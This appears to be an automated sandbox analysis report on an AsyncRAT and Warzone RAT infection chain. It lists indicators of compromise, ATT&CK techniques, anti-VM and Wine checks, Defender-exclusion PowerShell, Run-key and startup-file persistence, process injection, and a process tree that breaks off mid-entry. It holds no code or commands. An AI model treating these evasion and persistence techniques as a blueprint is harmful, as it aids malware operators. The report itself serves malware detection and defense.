asyncrat | 2f5d7f23e220019fff39d5835e9a743ffb876d6eeb9c7617bb57438e184da56d

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	H3tyh96.exe

Warzone RAT payload 6 IoCs

rat

resource	yara_rule
behavioral2/memory/1124-21-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1124-27-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1604-30-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1124-34-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1124-60-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1604-135-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3196	powershell.exe
5288	powershell.exe
2664	powershell.exe
5952	powershell.exe
3968	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	H3tyh96.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	KrnlSetup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	H3tyh96.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	C1J7SVw.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs	dog.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs	outvaunts.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs	cat.exe

Executes dropped EXE 35 IoCs

pid	Process
4040	wrofile1.exe
1124	wrofile1.exe
1604	wrofile1.exe
4112	H3tyh96.exe
4248	cat.exe
584	images.exe
3048	images.exe
1092	images.exe
1968	AutoHotkeyU64.exe
4376	Setup.exe
364	dog.exe
5724	KrnlSetup.exe
6136	Client-built.exe
6992	Z9Pp9pM.exe
6528	APQSKVTvd60SdAM.exe
6020	HKP098767890HJ.exe
1060	profile1.exe
4816	outvaunts.exe
1032	profile1.exe
5600	profile1.exe
6956	outvaunts.exe
3216	outvaunts.exe
5516	outvaunts.exe
3544	C1J7SVw.exe
536	7z.exe
1392	7z.exe
6812	7z.exe
6900	7z.exe
5712	7z.exe
2820	7z.exe
6428	7z.exe
804	7z.exe
2032	in.exe
2388	Intel_PTT_EK_Recertification.exe
3200	Intel_PTT_EK_Recertification.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	H3tyh96.exe

Loads dropped DLL 8 IoCs

pid	Process
536	7z.exe
1392	7z.exe
6812	7z.exe
6900	7z.exe
5712	7z.exe
2820	7z.exe
6428	7z.exe
804	7z.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	outvaunts.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe"	wrofile1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/6020-6577-0x0000000000650000-0x0000000000814000-memory.dmp	autoit_exe
behavioral2/memory/4816-6745-0x00000000007F0000-0x00000000009B4000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4112	H3tyh96.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 4040 set thread context of 1124	4040	wrofile1.exe	85
PID 4040 set thread context of 1604	4040	wrofile1.exe	86
PID 584 set thread context of 3048	584	images.exe	90
PID 584 set thread context of 1092	584	images.exe	91
PID 4248 set thread context of 2452	4248	cat.exe	95
PID 364 set thread context of 2392	364	dog.exe	104
PID 1060 set thread context of 1032	1060	profile1.exe	119
PID 1060 set thread context of 5600	1060	profile1.exe	120
PID 4816 set thread context of 6956	4816	outvaunts.exe	124
PID 4816 set thread context of 3216	4816	outvaunts.exe	125
PID 4816 set thread context of 5516	4816	outvaunts.exe	126
PID 2452 set thread context of 6276	2452	InstallUtil.exe	173
PID 2388 set thread context of 228	2388	Intel_PTT_EK_Recertification.exe	175
PID 3200 set thread context of 6040	3200	Intel_PTT_EK_Recertification.exe	180

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cdc-6530.dat	upx
behavioral2/memory/6020-6536-0x0000000000650000-0x0000000000814000-memory.dmp	upx
behavioral2/memory/4816-6578-0x00000000007F0000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/6020-6577-0x0000000000650000-0x0000000000814000-memory.dmp	upx
behavioral2/memory/4816-6745-0x00000000007F0000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/2032-6833-0x00007FF7FE5E0000-0x00007FF7FEA70000-memory.dmp	upx
behavioral2/memory/2032-6830-0x00007FF7FE5E0000-0x00007FF7FEA70000-memory.dmp	upx
behavioral2/memory/2388-6856-0x00007FF7964B0000-0x00007FF796940000-memory.dmp	upx
behavioral2/memory/2388-6870-0x00007FF7964B0000-0x00007FF796940000-memory.dmp	upx
behavioral2/memory/3200-6895-0x00007FF7964B0000-0x00007FF796940000-memory.dmp	upx

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6436	sc.exe
6600	sc.exe
4768	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
804	6368	WerFault.exe	105
1120	4112	WerFault.exe	87

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C1J7SVw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wrofile1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	APQSKVTvd60SdAM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	outvaunts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HKP098767890HJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	outvaunts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wrofile1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	H3tyh96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	outvaunts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	profile1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	images.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	images.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Z9Pp9pM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	images.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	profile1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wrofile1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	profile1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	outvaunts.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5228	PING.EXE
1968	powershell.exe
5560	PING.EXE
5824	powershell.exe
2528	PING.EXE
920	powershell.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Runs net.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
2528	PING.EXE
5228	PING.EXE
5560	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
6044	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4112	H3tyh96.exe
4112	H3tyh96.exe
4112	H3tyh96.exe
4112	H3tyh96.exe
4248	cat.exe
4248	cat.exe
4112	H3tyh96.exe
4112	H3tyh96.exe
364	dog.exe
364	dog.exe
5952	powershell.exe
5952	powershell.exe
5952	powershell.exe
6024	powershell.exe
6024	powershell.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
6024	powershell.exe
6956	outvaunts.exe
6956	outvaunts.exe
6956	outvaunts.exe
6956	outvaunts.exe
5516	outvaunts.exe
5516	outvaunts.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
2452	InstallUtil.exe
5288	powershell.exe
5288	powershell.exe
6024	powershell.exe
3968	powershell.exe
3968	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4816	outvaunts.exe
4816	outvaunts.exe
4816	outvaunts.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4416	New Text Document mod.exe
Token: SeDebugPrivilege	4040	wrofile1.exe
Token: SeDebugPrivilege	4112	H3tyh96.exe
Token: SeDebugPrivilege	584	images.exe
Token: SeDebugPrivilege	4248	cat.exe
Token: SeDebugPrivilege	4248	cat.exe
Token: SeDebugPrivilege	5724	KrnlSetup.exe
Token: SeDebugPrivilege	364	dog.exe
Token: SeDebugPrivilege	6136	Client-built.exe
Token: SeDebugPrivilege	364	dog.exe
Token: SeDebugPrivilege	2392	InstallUtil.exe
Token: SeDebugPrivilege	5952	powershell.exe
Token: SeDebugPrivilege	2452	InstallUtil.exe
Token: SeDebugPrivilege	1060	profile1.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeDebugPrivilege	5516	outvaunts.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeRestorePrivilege	536	7z.exe
Token: 35	536	7z.exe
Token: SeSecurityPrivilege	536	7z.exe
Token: SeSecurityPrivilege	536	7z.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeDebugPrivilege	5304	whoami.exe
Token: SeRestorePrivilege	1392	7z.exe
Token: 35	1392	7z.exe
Token: SeSecurityPrivilege	1392	7z.exe
Token: SeSecurityPrivilege	1392	7z.exe
Token: SeRestorePrivilege	6812	7z.exe
Token: 35	6812	7z.exe
Token: SeSecurityPrivilege	6812	7z.exe
Token: SeDebugPrivilege	5288	powershell.exe
Token: SeSecurityPrivilege	6812	7z.exe
Token: SeRestorePrivilege	6900	7z.exe
Token: 35	6900	7z.exe
Token: SeSecurityPrivilege	6900	7z.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	6900	7z.exe
Token: SeRestorePrivilege	5712	7z.exe
Token: 35	5712	7z.exe
Token: SeSecurityPrivilege	5712	7z.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
6020	HKP098767890HJ.exe
6020	HKP098767890HJ.exe
4816	outvaunts.exe
4816	outvaunts.exe
6276	AddInProcess.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
6020	HKP098767890HJ.exe
6020	HKP098767890HJ.exe
4816	outvaunts.exe
4816	outvaunts.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4112	H3tyh96.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4416 wrote to memory of 4040	4416	New Text Document mod.exe	84
PID 4416 wrote to memory of 4040	4416	New Text Document mod.exe	84
PID 4416 wrote to memory of 4040	4416	New Text Document mod.exe	84
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1124	4040	wrofile1.exe	85
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4040 wrote to memory of 1604	4040	wrofile1.exe	86
PID 4416 wrote to memory of 4112	4416	New Text Document mod.exe	87
PID 4416 wrote to memory of 4112	4416	New Text Document mod.exe	87
PID 4416 wrote to memory of 4112	4416	New Text Document mod.exe	87
PID 4416 wrote to memory of 4248	4416	New Text Document mod.exe	88
PID 4416 wrote to memory of 4248	4416	New Text Document mod.exe	88
PID 1604 wrote to memory of 584	1604	wrofile1.exe	89
PID 1604 wrote to memory of 584	1604	wrofile1.exe	89
PID 1604 wrote to memory of 584	1604	wrofile1.exe	89
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 3048	584	images.exe	90
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 584 wrote to memory of 1092	584	images.exe	91
PID 4416 wrote to memory of 1968	4416	New Text Document mod.exe	92
PID 4416 wrote to memory of 1968	4416	New Text Document mod.exe	92
PID 4248 wrote to memory of 2452	4248	cat.exe	95
PID 4248 wrote to memory of 2452	4248	cat.exe	95
PID 4248 wrote to memory of 2452	4248	cat.exe	95
PID 4248 wrote to memory of 2452	4248	cat.exe	95
PID 4248 wrote to memory of 2452	4248	cat.exe	95
PID 4248 wrote to memory of 2452	4248	cat.exe	95
PID 4416 wrote to memory of 4376	4416	New Text Document mod.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3528	attrib.exe
4400	attrib.exe
5464	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe
      C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1124
  - - C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe
      C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1604
    - - C:\ProgramData\images.exe
        
        "C:\ProgramData\images.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:584
      - C:\ProgramData\images.exe
        
        C:\ProgramData\images.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3048
      - C:\ProgramData\images.exe
        
        C:\ProgramData\images.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1092
- - C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe
    "C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
